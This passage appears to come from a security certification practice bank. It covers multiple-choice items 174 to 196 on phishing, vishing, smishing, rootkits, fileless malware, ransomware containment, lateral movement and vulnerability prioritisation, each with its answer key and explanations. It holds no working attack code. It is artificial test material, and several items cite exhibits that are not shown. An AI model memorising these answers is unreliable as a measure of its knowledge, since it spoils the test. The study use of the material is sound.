Option A is wrong because an internal print server with a high-severity finding and no direct user access has a lower attack surface (internal network only) and no direct user interaction, making it less urgent than an internet-facing system with a critical vulnerability and known exploit. Option B is wrong because a lab workstation with a critical finding and no sensitive data, while serious, is typically isolated or used for testing, so the impact of compromise is limited compared to an externally reachable server. Option D is wrong because a user laptop with a medium-severity issue that requires local access is less critical—medium severity and local access requirement reduce the likelihood of remote exploitation, and user laptops can often be mitigated temporarily with user awareness or endpoint controls.

174
MCQeasy

An employee receives a text message that says, "Your MFA enrollment expired. Tap here now to re-activate access or your account will be locked." What should the employee do first?

A.Tap the link and complete the MFA reset immediately
B.Verify the request using a known company contact method and report the text
C.Forward the text to coworkers so they can watch for it too
D.Reply to the sender and ask for more details
AnswerB

This is the best first step because the employee should not trust a security-related request delivered through an unexpected text message. Using a known internal help desk number, portal, or security reporting process confirms whether the request is legitimate. It also helps the organization investigate the suspicious message quickly.

Why this answer

Option B is correct because the message is a classic phishing attempt designed to harvest MFA credentials or session tokens. The employee must first verify the request through a trusted company channel (e.g., calling the IT help desk or checking the official security portal) and then report the text to the security team. This prevents falling for social engineering that could bypass MFA protections.

Exam trap

The trap here is that candidates assume MFA is unbreakable and rush to re-enroll, not realizing that phishing kits can intercept MFA tokens in real time via reverse proxy attacks.

How to eliminate wrong answers

Option A is wrong because tapping the link could lead to a fake MFA portal that captures the employee's credentials or session tokens, compromising their account. Option C is wrong because forwarding the text to coworkers risks spreading the phishing attempt and may cause others to fall for it before the threat is contained. Option D is wrong because replying to the sender confirms the phone number is active and may expose the employee to further targeted attacks or malware delivery.

175
MCQmedium

A vulnerability scan reports that a Windows file share has SMB signing disabled and anonymous read access is permitted to one directory containing payroll exports. No exploitation has been observed yet. Which action best reduces exposure with minimal business impact?

A.Remove all backup jobs until the scan is cleared.
B.Disable the file server and rebuild it from scratch immediately.
C.Enable SMB signing and remove anonymous access to the share.
D.Increase the directory quota so the share cannot overflow.
AnswerC

This is the best targeted remediation because it directly addresses both weaknesses identified by the scan. SMB signing helps protect integrity for SMB traffic, and removing anonymous read access prevents unauthorized users from viewing sensitive payroll data. Together, these changes reduce exposure without taking the entire server offline. In vulnerability management, the best choice is often a precise configuration fix that closes the finding while preserving business continuity and avoiding more disruptive action than necessary.

Why this answer

Option C is correct because enabling SMB signing prevents man-in-the-middle attacks that could tamper with file transfers, and removing anonymous read access eliminates unauthorized visibility into sensitive payroll data. These changes directly address the two vulnerabilities (SMB signing disabled and anonymous read access) without disrupting legitimate file-sharing operations, thus minimizing business impact.

Exam trap

The trap here is that candidates may overreact by choosing extreme remediation (like rebuilding the server) or irrelevant actions (like adjusting quotas), instead of recognizing that targeted configuration changes (enabling SMB signing and removing anonymous access) are the proportional, low-impact fix.

How to eliminate wrong answers

Option A is wrong because removing backup jobs does not address the SMB signing or anonymous access vulnerabilities; it would only increase data loss risk without reducing exposure. Option B is wrong because immediately disabling and rebuilding the file server is an extreme, unnecessary measure that causes significant business disruption; the vulnerabilities can be fixed with configuration changes. Option D is wrong because increasing the directory quota prevents overflow but does not mitigate the security issues of disabled SMB signing or anonymous read access.

176
MCQmedium

A scanner reports a critical vulnerability on an internal Linux server. The administrator confirms the vulnerable package is installed, but the affected feature is only enabled when an optional module is loaded, and that module is currently disabled. The server also requires downtime for patching. What is the best next step?

A.Immediately accept the risk and leave the server unchanged
B.Verify whether the vulnerable function is reachable, then apply a compensating control or schedule remediation
C.Mark the finding as a false positive and close the ticket
D.Remove the server from production immediately and rebuild it from scratch
AnswerB

Risk-based remediation starts by confirming exploitability, then choosing the least disruptive control that reduces exposure.

Why this answer

Option B is correct because even though the vulnerable module is disabled, the administrator must first verify that the vulnerable function is not reachable through other means (e.g., via a different service or misconfiguration). If it is unreachable, applying a compensating control (like a firewall rule or SELinux policy) can mitigate risk without immediate downtime, allowing patching to be scheduled. This aligns with the principle of defense-in-depth and proper risk management.

Exam trap

The trap here is that candidates assume a disabled module means the vulnerability is automatically not exploitable, ignoring that the vulnerable code is still present and could be enabled through other vectors or misconfiguration.

How to eliminate wrong answers

Option A is wrong because immediately accepting risk without verifying reachability or applying a compensating control is premature; the vulnerability may still be exploitable if the module can be enabled remotely or if the package has other attack surfaces. Option C is wrong because marking the finding as a false positive is incorrect—the vulnerability is real (the package is installed and vulnerable), even if the optional module is disabled; a false positive would mean the scanner reported a vulnerability that does not exist, which is not the case here.

177
MCQmedium

A workstation starts failing security checks. The antivirus service no longer appears in the running process list, a known driver's hash does not match the vendor's value, and a task manager view shows fewer processes than expected. The user also reports that local admin tools behave inconsistently. What type of malware is most likely present?

A.Spyware
B.Rootkit
C.Trojan
D.Logic bomb
AnswerB

A rootkit is designed to hide malicious activity and maintain stealth by manipulating operating system internals, drivers, or kernel components. Missing processes and hash mismatches support that conclusion.

Why this answer

The symptoms—antivirus service missing from the process list, a known driver's hash mismatch, fewer processes in Task Manager, and inconsistent admin tool behavior—are classic indicators of a rootkit. Rootkits operate at kernel or driver level, allowing them to hide processes, files, and registry keys from standard system tools, and they often tamper with driver hashes to evade integrity checks.

Exam trap

The trap here is that candidates often confuse a rootkit with a trojan because both can be stealthy, but the specific clues—driver hash mismatch and hidden processes—point to kernel-level manipulation unique to rootkits, not the user-level deception of a trojan.

How to eliminate wrong answers

Option A is wrong because spyware typically focuses on data theft and monitoring (e.g., keylogging, screen captures) and does not hide its processes or alter driver hashes at the kernel level. Option C is wrong because a trojan masquerades as legitimate software to gain initial access but does not inherently possess the capability to hide processes or modify driver hashes post-infection. Option D is wrong because a logic bomb is a dormant piece of code triggered by a specific condition (e.g., date or event) and does not actively hide processes or alter system drivers.

178
MCQhard

Based on the exhibit, what is the BEST immediate containment action? The workstation is still powered on, and the user reports that files are being renamed and the system is running very slowly. The security analyst confirms malicious activity is in progress.

A.Immediately isolate the endpoint from the network using EDR containment or switch quarantine.
B.Power off the workstation immediately to prevent any further file changes.
C.Uninstall Microsoft Office so the malicious spreadsheet cannot launch again.
D.Block the destination IP address at the firewall and wait for the user to log off.
AnswerA

The device is actively exhibiting ransomware-like behavior, and isolation stops lateral spread and additional command-and-control traffic while preserving the powered-on system for later review.

Why this answer

Option A is correct because the immediate priority is to stop the active malicious activity (file renaming, system slowdown) by severing the workstation's network connectivity. EDR containment or switch quarantine isolates the endpoint at Layer 2, preventing the attacker from exfiltrating data, communicating with command-and-control servers, or spreading laterally, while preserving volatile memory for forensic analysis. This is faster and more controlled than powering off, which destroys evidence and may trigger destructive payloads.

Exam trap

CompTIA often tests the distinction between containment (stopping the spread) and eradication (removing the threat), tempting candidates to choose power-off or uninstall actions that destroy evidence or fail to stop active malicious processes.

How to eliminate wrong answers

Option B is wrong because powering off the workstation destroys volatile evidence (e.g., running processes, network connections, memory-resident malware) and may trigger destructive payloads designed to activate on shutdown. Option C is wrong because uninstalling Microsoft Office is a remediation step, not an immediate containment action; it does not stop the ongoing malicious activity and may take too long while the attacker continues to rename files. Option D is wrong because blocking the destination IP at the firewall does not stop the local malicious process already running on the workstation, and waiting for the user to log off allows further damage; containment must be applied directly to the endpoint.

179
MCQmedium

A file server suddenly shows many encrypted files with a new extension, and endpoint tools report that Volume Shadow Copy Service was disabled minutes earlier. A note on the desktop demands payment in cryptocurrency. What should the security team do first?

A.Pay the ransom immediately to restore access quickly.
B.Isolate the affected systems from the network and preserve evidence.
C.Reimage the server immediately without documenting the event.
D.Disable antivirus alerts so staff can work without distractions.
AnswerB

Isolation is the first priority because it helps stop the spread of ransomware and prevents additional encryption or lateral movement. Preserving evidence at the same time supports later incident response, forensics, and potential legal or insurance needs. The organization can then assess the scope, validate backups, and begin containment and recovery in a controlled way. Immediate disconnection from the network is usually more valuable than attempting remediation on a live, actively infected host.

Why this answer

Isolating the affected systems from the network and preserving evidence is the correct first step because it prevents the ransomware from spreading to other systems via SMB or other network protocols, and it preserves the forensic artifacts (e.g., the ransom note, encrypted files, and Volume Shadow Copy Service logs) needed for incident response and potential decryption. Disabling VSS is a common ransomware tactic to prevent file recovery, so immediate containment is critical before any remediation.

Exam trap

The trap here is that candidates may confuse 'immediate remediation' (e.g., reimaging) with 'first response' (containment and evidence preservation), or they may incorrectly assume paying the ransom is a viable technical solution, when in fact it is never recommended in incident response frameworks like NIST SP 800-61.

How to eliminate wrong answers

Option A is wrong because paying the ransom does not guarantee decryption (attackers may not provide the key), it funds further criminal activity, and it violates most organizational security policies and legal guidelines. Option C is wrong because reimaging the server immediately destroys all forensic evidence (e.g., memory dumps, logs, encrypted file samples) that could be used for attribution, decryption research, or legal action, and it bypasses the necessary containment step to prevent lateral movement.

180
MCQmedium

During triage, you see a legitimate browser process spawning powershell.exe with an encoded command, followed by an outbound connection to a newly registered domain. No new executable is written to disk. Which malware characteristic best fits this behavior?

A.Fileless malware that relies on scripting and memory-resident execution.
B.A macro virus that only runs when a document is opened.
C.A boot sector virus that persists by altering startup code.
D.A logic bomb that activates only when a specific date or event is reached.
AnswerA

This pattern matches malware that abuses trusted processes and scripts instead of dropping a traditional executable file. Browser-to-PowerShell chaining, encoded commands, and memory-resident activity are common indicators. The lack of a new file on disk does not mean the endpoint is clean; it often means the attacker is trying to evade traditional file-based detection.

Why this answer

Option A is correct because the described behavior—a legitimate browser process spawning PowerShell with an encoded command, executing in memory without writing a new executable to disk, and making an outbound connection to a newly registered domain—is the classic hallmark of fileless malware. Fileless malware leverages built-in scripting engines (like PowerShell) and runs entirely in memory, avoiding traditional disk-based detection by antivirus and forensic tools.

Exam trap

The trap here is that candidates may assume any malware that doesn't write a file is a 'macro virus' or 'boot sector virus,' but the key differentiator is the use of a scripting engine (PowerShell) spawned by a legitimate process, combined with memory-only execution and an immediate C2 connection, which uniquely defines fileless malware.

How to eliminate wrong answers

Option B is wrong because a macro virus requires a document to be opened and typically writes a macro to the document or template, whereas the scenario involves a browser process spawning PowerShell with an encoded command and no document interaction. Option C is wrong because a boot sector virus alters the Master Boot Record (MBR) or Volume Boot Record (VBR) to persist on disk at system startup, but the scenario shows no disk write and execution is memory-resident via a scripting engine. Option D is wrong because a logic bomb triggers only when a specific condition (date, event, or user action) is met, but the scenario describes an immediate outbound connection following the PowerShell execution, with no mention of a delayed or conditional trigger.

181
MCQeasy

A user reports that their laptop is showing frequent pop-up ads, the browser homepage keeps changing, and the system has become noticeably slower. What is the most likely immediate containment action?

A.Keep the laptop online so security tools can continue collecting data
B.Disconnect the laptop from the network and begin endpoint isolation
C.Immediately reimage the laptop before preserving any evidence
D.Ask the user to uninstall the browser and reinstall it manually
AnswerB

Network isolation stops the suspected malicious software from communicating outward or spreading while analysts investigate the device.

Why this answer

The best immediate action is to isolate the laptop from the network. The symptoms suggest malicious or unwanted software may be communicating with outside servers or affecting the browser. Isolation limits further damage, prevents possible spread, and gives responders time to inspect the system safely. This is a standard first containment step when a workstation appears compromised but is still active.

Why others are wrong: Keeping the laptop online risks continued malicious activity. Reimaging too early can destroy evidence needed for root-cause analysis. Simply reinstalling the browser may remove a symptom, but it does not address the possibility of a broader endpoint compromise.

182
MCQmedium

A finance clerk reports a call from a person who claimed to be from the bank's fraud department. The caller knew the employee's name, referenced a recent invoice, and asked the employee to read back a one-time MFA code to stop a supposed payment block. Which attack is most likely?

A.Vishing, because the attacker is using a voice call to manipulate the target in real time.
B.Smishing, because the attacker requested a code and mentioned a financial problem.
C.Baiting, because the caller offered to fix the payment issue for the employee.
D.Tailgating, because the attacker used a trusted identity to gain access.
AnswerA

Vishing is voice-based phishing. The attacker used a phone call, gained trust with specific details, and pressured the employee to reveal an MFA code. That real-time conversation and the request for a secret value are classic indicators of a voice social engineering attempt.

Why this answer

The attack is vishing (voice phishing) because the attacker uses a telephone call to socially engineer the target into divulging a one-time MFA code. The real-time voice interaction and the specific request for an authentication code are hallmarks of vishing, which exploits human trust rather than technical vulnerabilities.

Exam trap

The trap here is confusing the delivery method (voice vs. text) and focusing on the content (request for a code) rather than the channel, leading candidates to incorrectly choose smishing when the attack is clearly voice-based.

How to eliminate wrong answers

Option B is wrong because smishing uses SMS text messages, not voice calls; the attacker here called the clerk, so the medium is voice, not text. Option C is wrong because baiting involves offering something enticing (e.g., a free USB drive) to lure the victim into an action, not a real-time request for a code over the phone. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area; this scenario involves no physical access, only a phone call.

183
MCQmedium

An EDR alert shows powershell.exe launching with an encoded command, no new executable written to disk, and a registry run key added for persistence. Outbound HTTPS traffic then begins to a rare external domain. Which type of malware behavior is most likely?

A.Worm behavior, because the malware is automatically spreading across the network.
B.Fileless attack, because the malicious activity is using legitimate tools and memory rather than a dropped payload.
C.Rootkit behavior, because the attacker is hiding from the operating system at a low level.
D.Spyware, because the malware is using HTTPS traffic to contact an external domain.
AnswerB

The alert shows encoded PowerShell, no new file on disk, and persistence through a registry run key. That pattern strongly suggests a fileless attack, where attackers abuse trusted system tools and memory-based execution to avoid traditional file detection.

Why this answer

The EDR alert describes a classic fileless attack: PowerShell.exe executes an encoded command in memory, no new executable is written to disk, and persistence is achieved via a registry run key. The outbound HTTPS traffic to a rare domain indicates command-and-control (C2) communication. Fileless malware leverages legitimate system tools (like PowerShell) and runs entirely in memory, bypassing traditional file-based detection.

Exam trap

The trap here is that candidates see 'HTTPS traffic to an external domain' and jump to spyware (Option D), but the question's emphasis on 'no new executable written to disk' and 'encoded command' points directly to fileless attack, not data exfiltration as the primary behavior.

How to eliminate wrong answers

Option A is wrong because worm behavior requires self-propagating across a network (e.g., exploiting vulnerabilities or copying itself), which is not indicated by a single PowerShell launch and registry persistence. Option C is wrong because rootkit behavior involves hiding from the OS at a low level (e.g., kernel-mode hooks or driver manipulation), not simply using PowerShell and registry keys. Option D is wrong because spyware typically exfiltrates data via HTTP/HTTPS, but the core behavior here—encoded command execution in memory with no file dropped—is the hallmark of a fileless attack, not spyware.

184
MCQeasy

Users can reach the correct website name, but their browsers are redirected to a fake server after the local DNS cache is altered. What attack is most likely?

A.DNS poisoning
B.Denial of service
C.Replay attack
D.Port scanning
AnswerA

DNS poisoning changes name-resolution information so users are sent to the wrong IP address. If the cache points a real name to a fake server, DNS poisoning is the most likely cause.

Why this answer

DNS poisoning (also known as DNS cache poisoning) occurs when an attacker inserts forged DNS resource records into the local DNS cache, causing subsequent queries for a legitimate domain to resolve to an attacker-controlled IP address. In this scenario, users type the correct website name, but because the local DNS cache has been altered, their browsers are redirected to a fake server. This directly matches the description of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with a man-in-the-middle attack or think that altering the local hosts file is the same mechanism, but the question specifically states the local DNS cache is altered, which is the hallmark of DNS cache poisoning.

How to eliminate wrong answers

Option B (Denial of service) is wrong because a denial-of-service attack aims to make a service unavailable by overwhelming it with traffic or exploiting vulnerabilities, not by redirecting users to a fake server after altering DNS cache. Option C (Replay attack) is wrong because a replay attack involves capturing and retransmitting valid network transmissions (e.g., authentication tokens) to impersonate a user or gain unauthorized access, not manipulating DNS resolution. Option D (Port scanning) is wrong because port scanning is a reconnaissance technique used to discover open ports and services on a target system, not an attack that alters DNS cache to redirect users.

185
MCQmedium

A scanner reports a critical vulnerability on an internal Linux server. The administrator verifies the package is installed, but the vulnerable code path is only present in a plugin that has been disabled and removed from the service startup. The server cannot be patched until a vendor maintenance window next month. What is the best next step?

A.Ignore the finding because the scanner is clearly wrong
B.Create a time-limited exception and apply compensating controls until patching is possible
C.Reinstall the disabled plugin so the scanner output matches the running configuration
D.Expose the server to the internet for faster monitoring and patch testing
AnswerB

A temporary exception with compensating controls balances business constraints and security while the team schedules a proper fix.

Why this answer

Option B is correct because the vulnerability exists in a disabled plugin, meaning the attack surface is reduced but not eliminated; residual risk remains if the plugin is re-enabled or if other dependencies are affected. Creating a time-limited exception with compensating controls (e.g., firewall rules, file permissions, SELinux policies) allows the organization to formally accept the risk until the vendor patch is applied, which aligns with standard vulnerability management processes.

Exam trap

The trap here is that candidates assume a disabled plugin means zero risk, but the exam expects you to recognize that the package is still installed and could be exploited if re-enabled, so formal risk acceptance with compensating controls is required rather than ignoring or re-enabling the plugin.

How to eliminate wrong answers

Option A is wrong because the scanner is not 'clearly wrong' — it correctly identified that the vulnerable package is installed, even though the vulnerable code path is disabled; ignoring the finding would bypass proper risk acceptance and could lead to compliance issues. Option C is wrong because reinstalling the disabled plugin would reintroduce the vulnerable code path, increasing the attack surface and contradicting the goal of reducing risk; the scanner output already reflects the installed package, and the administrator should not alter the configuration to match a false sense of security.

186
MCQmedium

NetFlow shows one workstation initiating SMB and WinRM sessions to 25 internal servers within 12 minutes, followed by a spike in Kerberos authentication requests and attempts to access admin shares. The user says they only opened an invoice spreadsheet. What is the most likely attacker objective?

A.Distributed denial-of-service activity against the internal network.
B.Lateral movement using compromised credentials to pivot across the environment.
C.Port scanning from an external attacker trying to enumerate exposed services.
D.DNS tunneling used to bypass content filtering and exfiltrate data.
AnswerB

The pattern of SMB, WinRM, Kerberos, and admin-share activity strongly suggests an attacker is using one compromised workstation to move laterally and reach additional systems. That behavior matches post-compromise pivoting, often with stolen credentials or remote execution tooling. The invoice spreadsheet is likely the initial infection vector.

Why this answer

The observed behavior—a single workstation initiating SMB and WinRM sessions to 25 internal servers in rapid succession, followed by a spike in Kerberos authentication requests and attempts to access admin shares—is a classic indicator of lateral movement using compromised credentials. The attacker likely obtained the user's credentials (e.g., via phishing in the invoice spreadsheet) and is using them to authenticate to multiple servers via WinRM for remote command execution and SMB for file access, with the Kerberos spike reflecting TGT/TGS requests as they pivot across the environment to escalate privileges or deploy ransomware.

Exam trap

The trap here is that candidates may mistake the Kerberos spike for a Kerberos-based attack (e.g., Kerberoasting) rather than recognizing it as a natural byproduct of lateral movement, where each new server connection triggers a TGS request, and the admin share access confirms the attacker is using compromised credentials to pivot, not just enumerate services.

How to eliminate wrong answers

Option A is wrong because DDoS activity would involve flooding the network with traffic from multiple sources, not a single workstation initiating authenticated sessions to internal servers; the pattern here is targeted and interactive, not volumetric. Option C is wrong because port scanning from an external attacker would show a broad range of IPs and ports being probed, not authenticated SMB/WinRM sessions followed by Kerberos requests; the use of valid credentials and admin share access indicates the attacker is already inside and moving laterally. Option D is wrong because DNS tunneling would manifest as unusual DNS query patterns (e.g., large or encoded queries) to exfiltrate data, not as SMB/WinRM sessions and Kerberos authentication spikes; the observed activity is about internal authentication and resource access, not data exfiltration via DNS.

187
MCQmedium

An internal file server has an administrative web console exposed on the same network as all user laptops. A scan shows that any authenticated employee can reach the console, and several failed login attempts are coming from a workstation that should never manage servers. What is the best hardening action?

A.Move the console to a separate management network and restrict access to admin hosts only.
B.Increase the number of shared passwords so administrators can log in faster.
C.Leave the console exposed but shorten the password expiration period.
D.Disable logging so failed attempts do not generate noise.
AnswerA

Administrative interfaces should not be reachable from ordinary user endpoints. Moving the console to a dedicated management network and allowing access only from approved admin systems reduces the attack surface and limits who can even attempt to log in. That is a strong hardening control because it addresses both exposure and misuse. If a workstation should never manage servers, network-level segmentation is the right place to enforce that boundary before authentication is even attempted.

Why this answer

The administrative web console should be isolated on a separate management network (out-of-band management) with strict access control lists (ACLs) allowing only designated admin hosts. This prevents lateral movement from compromised user workstations and eliminates the attack surface exposed to all authenticated employees. Network segmentation is a fundamental defense-in-depth control for managing critical infrastructure, as it enforces the principle of least privilege at the network layer.

Exam trap

CompTIA often tests the misconception that password policies (rotation, complexity, or expiration) are sufficient hardening for exposed management interfaces, when in fact network segmentation and access control are the primary mitigations.

How to eliminate wrong answers

Option B is wrong because increasing the number of shared passwords does not address the root cause of unauthorized access; it actually weakens accountability and increases the risk of credential theft. Option C is wrong because shortening the password expiration period does not prevent an attacker from reaching the console; it only slightly reduces the window of opportunity for a compromised password, while the console remains exposed to all users. Option D is wrong because disabling logging removes visibility into security events, violating the fundamental security principle of auditability and making incident response impossible.

188
MCQmedium

A help desk agent receives a phone call from someone claiming to be a regional sales manager who says they are locked out before a customer demo. The caller knows a few employee names and asks the agent to reset the account and temporarily bypass MFA. What attack is most likely?

A.Spear phishing, because the caller used specific employee details to appear credible.
B.Vishing, because the attacker is using a voice call to pressure support staff into changing access.
C.Pretexting, because the attacker is creating a false identity and believable story.
D.Baiting, because the attacker offered a tempting opportunity tied to a customer demo.
AnswerB

Vishing is voice-based social engineering, and this scenario centers on a caller using urgency and credibility to trick the help desk into resetting access and weakening MFA controls.

Why this answer

Option B is correct because vishing (voice phishing) specifically involves using a phone call to socially engineer a target into performing an action, such as resetting credentials and bypassing MFA. The attacker pressures the help desk agent by creating urgency around a customer demo, which is a classic vishing tactic to bypass security controls.

Exam trap

The trap here is that candidates confuse pretexting (the false identity) with the delivery method (vishing), but the exam expects you to identify the specific attack vector—voice call—as the defining characteristic of vishing.

How to eliminate wrong answers

Option A is wrong because spear phishing is an email-based attack that uses personalized content to trick the recipient into clicking a link or opening an attachment, not a voice call. Option C is wrong because while pretexting involves creating a false identity and story, the specific attack vector here is a voice call, making vishing the more precise classification under social engineering. Option D is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure the victim, not using a fabricated story over the phone.

189
MCQmedium

Based on the exhibit, what is the most likely issue with the software component being built?

A.Supply-chain compromise, because the dependency may have been altered before it reached the build pipeline.
B.Cross-site scripting, because the package name suggests the application handles web content.
C.Credential stuffing, because automated systems frequently reuse credentials during updates.
D.Replay attack, because the nightly pipeline used an old copy of the package request.
AnswerA

A checksum or integrity mismatch during an automated dependency pull is a strong sign that the package may have been tampered with in transit or replaced in the software supply chain. Because the build pipeline trusted the registry source automatically, the control failure is around dependency integrity and third-party trust.

Why this answer

The exhibit shows a build pipeline that fetches a dependency from a public repository. If the dependency has been tampered with before it reaches the pipeline, this is a classic supply-chain compromise. Attackers often inject malicious code into popular open-source packages, which then gets incorporated into the build, compromising the final software component.

Exam trap

The trap here is that candidates may confuse a supply-chain compromise with a web-specific attack like XSS, but the question's context of a build pipeline and dependency fetching points directly to the integrity of the software supply chain.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) is a web application vulnerability that allows injection of malicious scripts into web pages, not an issue with a build pipeline or dependency integrity. Option C is wrong because credential stuffing involves using stolen credentials to gain unauthorized access to accounts, not a problem with automated build systems reusing credentials during updates. Option D is wrong because a replay attack involves intercepting and retransmitting a valid data transmission, not using an old copy of a package request in a nightly pipeline.

190
MCQmedium

Based on the exhibit, what type of malware is the most likely issue on the workstation?

A.Spyware, because the system appears to be collecting user data silently.
B.Ransomware, because the browser settings changed after installation.
C.Rootkit, because the endpoint security console detected an unknown process.
D.Worm, because the software was installed from an unofficial website.
AnswerA

Spyware is the best fit because the symptoms show covert data collection and tracking behavior. The unwanted browser extension, the repeated outbound traffic to a tracking domain, and the access to saved cookies all point to surveillance and data theft rather than encryption or destructive behavior.

Why this answer

The exhibit shows a browser extension installed from an unofficial website that is silently collecting browsing data, including keystrokes and visited URLs, which is characteristic of spyware. Spyware operates by gathering user information without consent, often through seemingly legitimate software, and the absence of encryption or user notification confirms this classification.

Exam trap

The trap here is that candidates confuse the symptom of changed browser settings with ransomware, but ransomware's primary action is file encryption or system lockout, not silent data collection, and the unofficial website installation is a red herring for worm propagation.

How to eliminate wrong answers

Option B is wrong because ransomware typically encrypts files or locks the system and demands payment, not merely changes browser settings after installation. Option C is wrong because a rootkit is designed to hide its presence and evade detection by security software, so an endpoint security console detecting an unknown process would indicate a different threat, not a rootkit. Option D is wrong because a worm self-replicates and spreads across networks without user interaction, whereas the issue here involves installation from an unofficial website, which is a common vector for spyware, not a worm.

191
MCQmedium

A vulnerability scan of a branch-office print server finds that its administrative web console is reachable from the internet. The appliance is still using the vendor's default password, and no access control list limits management access to the office subnet or VPN. Which remediation would reduce risk the most with the least disruption?

A.Increase the password length policy and leave the console publicly reachable.
B.Disable the management interface entirely and replace the device immediately.
C.Restrict management access to the office network or VPN and change the default credentials.
D.Apply a patch after the next quarterly maintenance window and keep the current exposure unchanged.
AnswerC

This is the best balance of security and operational impact. Publicly exposed administration interfaces are high-risk, especially when default credentials are still enabled. Limiting access to a trusted management network or VPN immediately reduces attack surface, while changing the vendor defaults removes a common compromise path. Together, these steps address the exposure without requiring a full replacement or major service outage.

Why this answer

Option C reduces risk the most with the least disruption by immediately addressing the two primary vulnerabilities: the default password and unrestricted internet exposure. Changing the default credentials prevents trivial authentication bypass, while restricting management access to the office subnet or VPN eliminates the attack surface from the public internet. This approach requires no hardware replacement or downtime, and it directly mitigates the highest-severity issues identified in the scan.

Exam trap

The trap here is that candidates may choose Option B (disable and replace) because it seems most secure, but they overlook that configuration changes (ACL and password reset) achieve the same security goal with far less disruption and cost.

How to eliminate wrong answers

Option A is wrong because increasing the password length policy does not address the fact that the default password is still in use; an attacker can still authenticate with the known default credential, rendering the policy change irrelevant. Option B is wrong because disabling the management interface entirely and replacing the device immediately is unnecessarily disruptive and costly; the device can be secured with configuration changes without replacement, and disabling the interface may prevent necessary administrative tasks. Option D is wrong because applying a patch after the next quarterly maintenance window leaves the console publicly reachable with default credentials for an extended period, which is a critical risk that should be remediated immediately, not deferred.

192
MCQeasy

A scan finds two issues: a critical vulnerability on an internet-facing VPN appliance with public exploit code, and a medium-severity issue on an internal test server. Which should be fixed first?

A.The internal test server issue, because test systems are always higher risk.
B.The VPN appliance issue, because it is critical and publicly exploitable.
C.Both issues at the same time without assigning a priority.
D.Neither issue, because scanners can produce false positives.
AnswerB

An internet-facing critical vulnerability with available exploit code presents a much higher likelihood of real-world compromise and should be prioritized first.

Why this answer

The VPN appliance issue should be fixed first because it is a critical vulnerability on an internet-facing system with publicly available exploit code. This combination means an attacker can directly compromise the appliance from the internet with minimal effort, leading to potential network breach and lateral movement. In contrast, the internal test server is less accessible and poses a lower immediate risk, even though it should still be addressed in due course.

Exam trap

The trap here is that candidates assume all vulnerabilities must be fixed in order of severity alone, ignoring the critical factor of asset exposure and exploitability, which CompTIA emphasizes in risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because test systems are not inherently higher risk than internet-facing production systems; the risk is determined by exposure, exploitability, and impact, not by system role alone. Option C is wrong because security resources are finite and prioritization is essential; treating all issues equally ignores the urgency of a critical, publicly exploitable vulnerability on an internet-facing asset.

193
Multi-Selecteasy

A small business web server still allows remote administration from the internet on port 3389, and the administrator password has never been changed from the vendor default. Which two issues should the security team prioritize first? Select two.

Select 2 answers
A.An exposed remote administration service
B.Default credentials still being in use
C.A missing screen-lock timeout on nearby laptops
D.A lack of encrypted email attachments
E.An outdated printer driver on the finance network
AnswersA, B

An internet-exposed management service is risky because it gives attackers a direct path to the system from outside the network.

Why this answer

Port 3389 is used by Remote Desktop Protocol (RDP), which is a remote administration service. Exposing RDP directly to the internet is a critical vulnerability because it allows attackers to perform brute-force or credential-stuffing attacks against the service. This is a high-priority issue because it provides an attack vector that can lead to full system compromise.

Exam trap

The trap here is that candidates may overlook the combination of exposed RDP and default credentials as the most urgent issues, instead focusing on a less critical physical security control like screen-lock timeout, which is not directly related to the internet-facing vulnerability.

194
MCQeasy

A user opens an attached document, and the endpoint security tool shows PowerShell running from memory with no new executable file written to disk. What type of attack is most likely?

A.Fileless attack
B.Ransomware
C.Rootkit
D.Logic bomb
AnswerA

Fileless attacks use legitimate tools or memory-only execution instead of dropping a visible malicious file.

Why this answer

The scenario describes PowerShell running from memory without a new executable file written to disk, which is the hallmark of a fileless attack. Fileless attacks leverage legitimate system tools like PowerShell, WMI, or .NET to execute malicious code directly in memory, bypassing traditional file-based detection mechanisms.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think that any attack using PowerShell must be a script-based attack, but the key indicator is the lack of a new executable file on disk, which distinguishes fileless attacks from traditional malware that writes files.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing executable files to disk or dropping a ransom note; the absence of a new executable file on disk makes this unlikely. Option C (Rootkit) is wrong because rootkits are designed to hide their presence and maintain persistent access, often by modifying the operating system kernel or boot process, not by executing solely from memory without any file artifacts. Option D (Logic bomb) is wrong because a logic bomb is a piece of malicious code that executes under specific conditions (e.g., a date or user action) and is usually embedded within a legitimate file or application, not executed purely from memory without a file.

195
MCQmedium

A security analyst is reviewing the source code of a custom authentication service. The service uses a function that compares a user-supplied password to the stored password hash by iterating through each byte and returning false immediately upon the first mismatch. The analyst measures the function's execution time and discovers it varies measurably depending on how many initial bytes match. Which type of attack is this vulnerability most likely to facilitate?

A.Brute-force attack
B.Dictionary attack
C.Replay attack
D.Timing attack
AnswerD

A timing attack exploits measurable variations in the time it takes to execute a cryptographic operation. In this case, the early-exit comparison enables an attacker to deduce the correct secret byte by byte, making it the correct classification.

Why this answer

The vulnerability is a timing attack because the comparison function returns false immediately upon the first mismatched byte, causing execution time to vary based on how many initial bytes match. An attacker can measure these timing differences to iteratively guess each byte of the password hash, effectively reducing the search space from exponential to linear. This is a classic side-channel attack that exploits observable timing variations in cryptographic or authentication operations.

Exam trap

The trap here is that candidates may confuse a timing attack with a brute-force or dictionary attack, not realizing that the key clue is the measurable variation in execution time due to early exit on mismatch, which is a classic side-channel indicator.

How to eliminate wrong answers

Option A is wrong because a brute-force attack tries all possible password combinations without leveraging timing differences; it relies on computational power, not side-channel information. Option B is wrong because a dictionary attack uses a precomputed list of common passwords or hashes, not timing measurements of the comparison function. Option C is wrong because a replay attack captures and retransmits valid authentication data (e.g., a token or hash) to impersonate a user; it does not involve analyzing execution time of a comparison function.

196
MCQmedium

Several employees report receiving SMS messages that appear to come from the corporate service desk. The text says, 'Your password expires today. Review the notice here,' followed by a shortened link that opens a fake sign-in page on a phone browser. Which type of attack is this?

A.Smishing
B.Pretexting
C.Tailgating
D.Spoofing
AnswerA

Smishing is phishing delivered through SMS or other text messaging platforms. The message uses urgency and a link to a fake login page to steal credentials.

Why this answer

